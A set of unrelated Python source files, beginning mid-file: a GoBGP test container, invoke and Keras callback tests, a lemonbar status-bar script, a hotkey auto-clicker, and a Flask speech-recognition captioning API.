d = toml.loads(config)
elif config_format is 'yaml':
d = yaml.load(config)
elif config_format is 'json':
d = json.loads(config)
else:
raise Exception('invalid config format {0}'.format(config_format))
asn = d['global']['config']['as']
router_id = d['global']['config']['router-id']
self.config = config
super(RawGoBGPContainer, self).__init__(name, asn, router_id,
ctn_image_name, log_level,
zebra, config_format)
def create_config(self):
with open('{0}/gobgpd.conf'.format(self.config_dir), 'w') as f:
print colors.yellow('[{0}\'s new gobgpd.conf]'.format(self.name))
print colors.yellow(indent(self.config))
f.write(self.config)
|
concurrency.py
|
from invoke.vendor.six.moves.queue import Queue
from invoke.exceptions import ExceptionWrapper
from invoke.util import ExceptionHandlingThread as EHThread
from spec import Spec, ok_, eq_
# TODO: rename
class ExceptionHandlingThread_(Spec):
class via_target:
def setup(self):
def worker(q):
q.put(7)
self.worker = worker
def base_case(self):
queue = Queue()
t = EHThread(target=self.worker, args=[queue])
t.start()
t.join()
eq_(queue.get(block=False), 7)
ok_(queue.empty())
def catches_exceptions(self):
# Induce exception by submitting a bad queue obj
t = EHThread(target=self.worker, args=[None])
t.start()
t.join()
wrapper = t.exception()
ok_(isinstance(wrapper, ExceptionWrapper))
eq_(wrapper.kwargs, {'args': [None], 'target': self.worker})
eq_(wrapper.type, AttributeError)
ok_(isinstance(wrapper.value, AttributeError))
def exhibits_is_dead_flag(self):
t = EHThread(target=self.worker, args=[None])
t.start()
t.join()
ok_(t.is_dead)
t = EHThread(target=self.worker, args=[Queue()])
t.start()
t.join()
ok_(not t.is_dead)
class via_subclassing:
def setup(self):
class MyThread(EHThread):
def __init__(self, *args, **kwargs):
self.queue = kwargs.pop('queue')
super(MyThread, self).__init__(*args, **kwargs)
def _run(self):
self.queue.put(7)
self.klass = MyThread
def base_case(self):
queue = Queue()
t = self.klass(queue=queue)
t.start()
t.join()
eq_(queue.get(block=False), 7)
ok_(queue.empty())
def catches_exceptions(self):
# Induce exception by submitting a bad queue obj
t = self.klass(queue=None)
t.start()
t.join()
wrapper = t.exception()
ok_(isinstance(wrapper, ExceptionWrapper))
eq_(wrapper.kwargs, {})
eq_(wrapper.type, AttributeError)
ok_(isinstance(wrapper.value, AttributeError))
def exhibits_is_dead_flag(self):
t = self.klass(queue=None)
t.start()
t.join()
ok_(t.is_dead)
t = self.klass(queue=Queue())
t.start()
t.join()
ok_(not t.is_dead)
|
test_callbacks.py
|
import os
import multiprocessing
import numpy as np
import pytest
from csv import Sniffer
import shutil
from keras import optimizers
from keras import initializers
from keras import callbacks
from keras.models import Sequential
from keras.layers.core import Dense, Dropout
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D
from keras.utils.test_utils import get_test_data
from keras.utils.test_utils import keras_test
from keras import backend as K
from keras.utils import np_utils
input_dim = 2
num_hidden = 4
num_class = 2
batch_size = 5
train_samples = 20
test_samples = 20
@keras_test
def test_TerminateOnNaN():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [callbacks.TerminateOnNaN()]
model = Sequential()
initializer = initializers.Constant(value=1e5)
for _ in range(5):
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu',
kernel_initializer=initializer))
model.add(Dense(num_class, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
@keras_test
def test_ModelCheckpoint():
np.random.seed(1337)
filepath = 'checkpoint.h5'
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.exists(filepath)
os.remove(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = 'checkpoint.{epoch:02d}.h5'
cbks = [callbacks.ModelCheckpoint(filepath, monitor=monitor,
save_best_only=save_best_only, mode=mode,
period=period)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=4)
assert os.path.exists(filepath.format(epoch=1))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=2))
os.remove(filepath.format(epoch=1))
os.remove(filepath.format(epoch=3))
@keras_test
def test_EarlyStopping():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
mode = 'max'
monitor = 'val_acc'
patience = 0
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
mode = 'auto'
monitor = 'val_acc'
patience = 2
cbks = [callbacks.EarlyStopping(patience=patience, monitor=monitor, mode=mode)]
history = model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=20)
@keras_test
def test_EarlyStopping_reuse():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = Sequential((
Dense(1, input_dim=1, activation='relu'),
Dense(1, activation='sigmoid'),
))
model.compile(optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
stopper = callbacks.EarlyStopping(monitor='acc', patience=patience)
weights = model.get_weights()
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper])
assert len(hist.epoch) >= patience
@keras_test
def test_LearningRateScheduler():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
@keras_test
def test_ReduceLROnPlateau():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
@keras_test
def test_CSVLogger():
np.random.seed(1337)
filepath = 'log.tsv'
sep = '\t'
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
# case 3, reuse of CSVLogger object
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=1)
import re
with open(filepath) as csvfile:
output = " ".join(csvfile.readlines())
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires tensorflow backend')
def test_TensorBoard():
np.random.seed(np.random.randint(1, 1e7))
filepath = './logs_' + str(np.random.randint(1, 1e4))
(X_train, y_train), (X_test, y_test) = get_test_data(
num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
def data_generator_graph(train):
while 1:
if train:
yield {'X_vars': X_train, 'output': y_train}
else:
yield {'X_vars': X_test, 'output': y_test}
# case 1 Sequential
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dropout(0.1))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
write_images=True, write_grads=True,
embeddings_freq=1,
embeddings_layer_names=['dense_1'],
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=3)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
# fit generator with validation data
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=cbks)
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), epochs=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), epochs=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason='Requires tensorflow backend')
def test_TensorBoard_convnet():
np.random.seed(np.random.randint(1, 1e7))
filepath = './logs_' + str(np.random.randint(1, 1e4))
input_shape = (16, 16, 3)
(x_train, y_train), (x_test, y_test) = get_test_data(num_train=500,
num_test=200,
input_shape=input_shape,
classification=True,
num_classes=4)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
model = Sequential([
Conv2D(filters=8, kernel_size=3,
activation='relu',
input_shape=input_shape),
MaxPooling2D(pool_size=2),
Conv2D(filters=4, kernel_size=(3, 3),
activation='relu', padding='same'),
GlobalAveragePooling2D(),
Dense(y_test.shape[-1], activation='softmax')
])
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1,
write_images=True, write_grads=True,
batch_size=16)
cbks = [tsb]
model.summary()
history = model.fit(x_train, y_train, epochs=2, batch_size=16,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
@keras_test
def test_CallbackValData():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbk = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=[cbk], epochs=1)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size],
y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size],
y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
cbk2 = callbacks.LambdaCallback(on_train_end=lambda x: 1)
model.fit_generator(data_generator(True), len(X_train), epochs=1,
validation_data=(X_test, y_test),
callbacks=[cbk2])
# callback validation data should always have x, y, and sample weights
assert len(cbk.validation_data) == len(cbk2.validation_data) == 3
assert cbk.validation_data[0] is cbk2.validation_data[0]
assert cbk.validation_data[1] is cbk2.validation_data[1]
assert cbk.validation_data[2].shape == cbk2.validation_data[2].shape
@keras_test
def test_LambdaCallback():
np.random.seed(1337)
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=5)
p.join()
assert not p.is_alive()
@keras_test
@pytest.mark.skipif((K.backend() != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard_with_ReduceLROnPlateau():
import shutil
np.random.seed(np.random.randint(1, 1e7))
filepath = './logs_' + str(np.random.randint(1, 1e4))
(X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples,
num_test=test_samples,
input_shape=(input_dim,),
classification=True,
num_classes=num_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(num_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(num_class, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, epochs=2)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
if __name__ == '__main__':
pytest.main([__file__])
|
__main__.py
|
"""
Joseph's lemonbar
"""
import subprocess
import time
import threading
import os
from .elements import get_battery, get_ws, get_date, get_volume, now_playing
from .constants import (
BG_COL, FG_COL, HL_COL,
GENERAL_PLACEHOLDER, TEXT_FONT, ICON_FONT
)
def restart():
print("Restarting...")
os.execvp("python3.7", ["python3.7", "-m", "bar"])
# the execvpe(2) syscall replaces the current process
# we will replace the current process with a new instance to
# restart the bar
def feed_lemonbar(lemonbar: subprocess.Popen):
while True:
ws = get_ws()
battery = get_battery()
date = get_date()
volume = get_volume()
np = now_playing()
bar_string = (
f"%{{O10000}}"
f"%{{U{HL_COL}+u}}"
f"%{{l}}{battery}"
f"{GENERAL_PLACEHOLDER}"
f"{ws}"
f"{GENERAL_PLACEHOLDER}"
f"%{{A:restart:}}\uf0e2%{{A}}"
f"%{{c}}{date}"
f"%{{r}}"
f"{GENERAL_PLACEHOLDER}"
f"{np}"
f"{volume}\n"
)
lemonbar.stdin.write(bar_string.encode())
lemonbar.stdin.flush()
time.sleep(0.25)
def consume_lemonbar(lemonbar: subprocess.Popen):
while True:
data = lemonbar.stdout.readline().decode().strip()
if data.strip() == "restart":
restart()
elif data.strip().startswith("switch-"):
desktop = data.strip()[7:]
os.popen(f"bspc desktop {desktop} -f")
if __name__ == "__main__":
lemonbar = subprocess.Popen(f"lemonbar "
f"-F \\{FG_COL} "
f"-B \\{BG_COL} "
f"-f {TEXT_FONT} "
f"-f {ICON_FONT} "
f"-u 0 -o 0 -g 1366x25+0+0",
stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
feeder = threading.Thread(target=feed_lemonbar, args=(lemonbar,))
feeder.start()
consumer = threading.Thread(target=consume_lemonbar, args=(lemonbar,))
consumer.start()
|
main.py
|
import time
from threading import Thread
import keyboard
import mouse
def event_loop():
while True:
if runnable_space:
keyboard.press_and_release("space")
if runnable_click:
mouse.click()
if exit_condition:
break
time.sleep(1)
def reverse_runnable_space():
global runnable_space
runnable_space = not runnable_space
def reverse_runnable_click():
global runnable_click
runnable_click = not runnable_click
exit_condition = False
runnable_space = False
runnable_click = False
Thread(target=event_loop).start()
keyboard.add_hotkey("win+shift+u", reverse_runnable_space)
keyboard.add_hotkey("win+shift+c", reverse_runnable_click)
keyboard.wait("win+esc", suppress=True)
exit_condition = True
|
flask_api.py
|
from flask import Flask, request
from flask import jsonify
from flask_cors import CORS, cross_origin
from omegaconf import OmegaConf
import numpy as np, math,torch,json
from support import load_model,W2lKenLMDecoder,W2lViterbiDecoder,load_data
import time,os
import sys
import webvtt
from nltk import sent_tokenize
# from punctuate import RestorePuncts
from yt_dlp import YoutubeDL
import ffmpeg
import datetime
import re
from gevent.pywsgi import WSGIServer
import subprocess
import io
from pydub import AudioSegment
import webrtcvad
from vad import frame_generator, vad_collector
from multiprocessing import Process
cuda = sys.argv[1]
# punct_model = RestorePuncts()
with open('config.json','r') as j:
config = json.load(j)
name2model_dict = dict()
for k,m in config.items():
if eval(m['lm_usage']):
lmarg = OmegaConf.create(m['lm_details'])
lmarg.unk_weight = -math.inf
model,dictionary = load_model(m['model_path'])
if cuda != 'cpu' and torch.cuda.is_available():
model.to(cuda)
generator = W2lKenLMDecoder(lmarg, dictionary)
else:
lmarg = OmegaConf.create({'nbest':1})
model,dictionary = load_model(m['model_path'])
if cuda != 'cpu' and torch.cuda.is_available():
model.to(cuda)
generator = W2lViterbiDecoder(lmarg, dictionary)
name2model_dict[k] = [model,generator,dictionary]
def align(fp_arr,cuda):
feature = torch.from_numpy(fp_arr).float()
if cuda != 'cpu' and torch.cuda.is_available():
feature = feature.to(cuda)
sample = {"net_input":{"source":None,"padding_mask":None}}
sample["net_input"]["source"] = feature.unsqueeze(0)
if cuda != 'cpu' and torch.cuda.is_available():
sample["net_input"]["padding_mask"] = torch.BoolTensor(sample["net_input"]["source"].size(1)).fill_(False).unsqueeze(0).to(cuda)
else:
sample["net_input"]["padding_mask"] = torch.BoolTensor(sample["net_input"]["source"].size(1)).fill_(False).unsqueeze(0)
model,generator,dictionary = name2model_dict['en']
with torch.no_grad():
hypo = generator.generate([model], sample, prefix_tokens=None)
hyp_pieces = dictionary.string(hypo[0][0]["tokens"].int().cpu())
tr = hyp_pieces.replace(' ','').replace('|',' ').strip()
return tr
#----------------------------------------------
MEDIA_FOLDER = "static/media"
os.makedirs(MEDIA_FOLDER, exist_ok=True)
#ydl_opts = {'outtmpl': MEDIA_FOLDER+'/%(id)s'}
ydl_opts_audio = {
'format': 'bestaudio[ext=m4a]',
'outtmpl': MEDIA_FOLDER+'/%(id)s.m4a',
}
ydl_audio = YoutubeDL(ydl_opts_audio)
def download_yt_audio(url):
info = ydl_audio.extract_info(url, download=True)
downloaded_audio_path = os.path.join(MEDIA_FOLDER, info['id']) + '.m4a'
return downloaded_audio_path
ydl_opts_video = {
#'format': 'bestvideo[height<=720]+bestaudio/best[height<=720]',
'outtmpl': MEDIA_FOLDER+'/%(id)s.webm'
}
ydl_video = YoutubeDL(ydl_opts_video)
def download_yt_video(yt_url):
return yt_url
#info = ydl_video.extract_info(yt_url, download=True)
#downloaded_video_path = os.path.join(MEDIA_FOLDER, info['id']) + '.webm'
#return downloaded_video_path
app = Flask(__name__)
cors = CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
@app.route("/")
@cross_origin()
def hello_world():
return "<p>Hi</p>"
@app.route("/download_video_to_local", methods=['POST'])
def download_video_to_local():
yt_url = request.form['url']
ydl_best = YoutubeDL({'format': 'best'})
downloaded_audio_path = download_yt_audio(yt_url)
info = ydl_best.extract_info(yt_url, download=False)
print(info.keys())
direct_url = info['url']
print(direct_url)
if os.path.isfile(downloaded_audio_path):
# Vieo will be downloaded in background
Process(target=download_yt_video, args=(yt_url, )).start()
downloaded_video_path = downloaded_audio_path.replace('.m4a', '.webm')
return {
'success': True,
'audio_url': downloaded_audio_path,
'download_path': downloaded_video_path,
'video_url': direct_url,
}
return {
'success': False,
}
@app.route("/transcribe_local_audio",methods=['POST'])
@cross_origin()
def transcribe_local_audio():
req_data = json.loads(request.data)
status = "SUCCESS"
#print(req_data)
audio_uri = req_data.get('audio_url',None)
vad_val = req_data.get('vad_level',2)
chunk_size = float(req_data.get('chunk_size',10.0))
#la = req_data['config']['language']['sourceLanguage']
#af = req_data['config']['audioFormat']
if audio_uri in [None,'']:
status = 'ERROR'
return jsonify({"status":status, "output":""})
print(audio_uri)
fp_arr = load_data(audio_uri,of='raw')
# try:
# fp_arr = load_data(audio_uri,of='raw')
# except Exception as e:
# status = 'ERROR'
# print(e)
# return jsonify({"status":status, "output":""})
#return jsonify({'op':align(fp_arr,cuda)})
op = "WEBVTT\n\n"
op_nochunk = "WEBVTT\n\n"
sample_rate = 16000
vad = webrtcvad.Vad(vad_val) #2
frames = frame_generator(30, fp_arr, sample_rate)
frames = list(frames)
segments = vad_collector(sample_rate, 30, 300, vad, frames)
vad_time_stamps = []
counter = 1
for i, (segment, (start_frame, end_frame)) in enumerate(segments):
song=AudioSegment.from_raw(io.BytesIO(segment), sample_width=2, frame_rate=16000, channels=1)
samples = song.get_array_of_samples()
fp_arr = np.array(samples).T.astype(np.float64)
fp_arr /= np.iinfo(samples.typecode).max
arr = fp_arr.reshape(-1)
op_nochunk += str(i+1) + '\n'
op_nochunk += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
#arr = np.array(samples)
# print(f'Start frame: {start_frame},\t End frame: {end_frame}')
for e,frame in enumerate(range(0,len(arr),int(chunk_size))):
#op += str(i+e+1) + '\n'
if end_frame-frame-start_frame <= chunk_size + 0.1:
#op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
# print(len(arr[int((start_frame+frame)*16000):int((end_frame)*16000)]),'Done')
# print(end_frame-frame-start_frame)
op_pred = align(arr[int((frame)*16000):int((end_frame)*16000)],cuda) +'\n\n'
if len(op_pred.strip()) >2:
op += str(counter) + '\n'
counter += 1
#op += str(i+e+1) + '\n'
op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
op+= op_pred
op_nochunk += op_pred
#op+= op_pred
#op_nochunk += op_pred
break
else:
#print('\nHere')
# print(int((start_frame+frame)*16000),int((start_frame+frame+5.1)*16000),'Done')
op_pred = align(arr[int((frame)*16000):int((frame+chunk_size+0.1)*16000)],cuda)
if len(op_pred.strip()) > 2:
op += str(counter) + '\n'
counter += 1
#op += str(i+e+1) + '\n'
op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(start_frame+frame+chunk_size)))+'\n'
op+= op_pred + '\n'
op_nochunk += op_pred +' '
#op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame+frame)),time.strftime('%H:%M:%S', time.gmtime(start_frame+frame+chunk_size)))+'\n'
#op_pred = align(arr[int((frame)*16000):int((frame+chunk_size+0.1)*16000)],cuda)
#op+= op_pred + '\n'
#op_nochunk += op_pred +' '
op += '\n'
op_nochunk += '\n'
# print(op)
#return jsonify({'output':op})
# op += str(i+1) + '\n'
# op += "{0}.000 --> {1}.000".format(time.strftime('%H:%M:%S', time.gmtime(start_frame)),time.strftime('%H:%M:%S', time.gmtime(end_frame)))+'\n'
# op += align(arr,cuda) +'\n'
#print(op)
with open('placeholder.vtt', 'w') as f:
f.write(op)
captions = webvtt.read('placeholder.vtt')
merged_caption = webvtt.WebVTT()
for i in range(0, len(captions), 2):
if i + 1 < len(captions):
curr_caption_len = len(captions[i].text.split(' '))
next_caption_len = len(captions[i+1].text.split(' '))
if curr_caption_len <= 4 or next_caption_len <= 4:
m_cap = webvtt.Caption(
captions[i].start,
captions[i+1].end,
captions[i].text + ' ' + captions[i+1].text
)
merged_caption.captions.append(m_cap)
else:
m_cap = webvtt.Caption(
captions[i].start,
captions[i].end,
captions[i].text
)
merged_caption.captions.append(m_cap)
m_cap = webvtt.Caption(
captions[i+1].start,
captions[i+1].end,
captions[i+1].text
)
merged_caption.captions.append(m_cap)
if i == len(captions):
m_cap = webvtt.Caption(
captions[i+1].start,
captions[i+1].end,
captions[i+1].text
)
merged_caption.captions.append(m_cap)
op = merged_caption.content
return jsonify({"status":status, "output":op,'vad_nochunk':op_nochunk})
'''
captions = webvtt.read('placeholder.vtt')
source_sentences = [caption.text.replace('\r', '').replace('\n', ' ') for caption in captions]
sent = ' '.join(source_sentences)
sent = sent.lower()
sent = re.sub(r'[^\w\s]', '', sent)
punctuated = punct_model.punctuate(sent)
tokenised = sent_tokenize(punctuated)
# words = punctuated.split(' ')
# len_marker = 0
# for i in range(len(captions)):
# curr = len(captions[i].text.split(' '))
# captions[i].text = ' '.join(words[len_marker: len_marker+curr])
# len_marker += curr
# # return captions.content
# captions.save('normalised.vtt')
final_vtt = webvtt.WebVTT()
start = datetime.datetime.strptime('00:00:00.000', '%H:%M:%S.%f')
for i in range(len(tokenised)):
len_ = len(tokenised[i].split(' '))
secs = len_ // 2
micro = round((len_/3)%1*1000)
delta = datetime.timedelta(seconds=secs, microseconds=micro)
end = start + delta
caption = webvtt.Caption(
start.time().strftime('%H:%M:%S.%f'),
end.time().strftime('%H:%M:%S.%f'),
tokenised[i]
)
start = end
final_vtt.captions.append(caption)
final_vtt.save('normalised.vtt')
with open('normalised.vtt', 'r') as f:
content = f.read()
return jsonify({"status":status, "output":content})
# return jsonify({"status":status, "output":""})
# return None
'''
if __name__ == '__main__':
#app.logger.setLevel(logging.DEBUG)
#from gevent import pywsgi
#from geventwebsocket.handler import WebSocketHandler
server = WSGIServer(('', 5000), app)
print("Server listening on: http://localhost:" + str(5000))
server.serve_forever()
#@app.route("/infer_ulca_en",methods=['POST'])
#@cross_origin()
#def infer_ulca_en():
# req_data = json.loads(request.data)
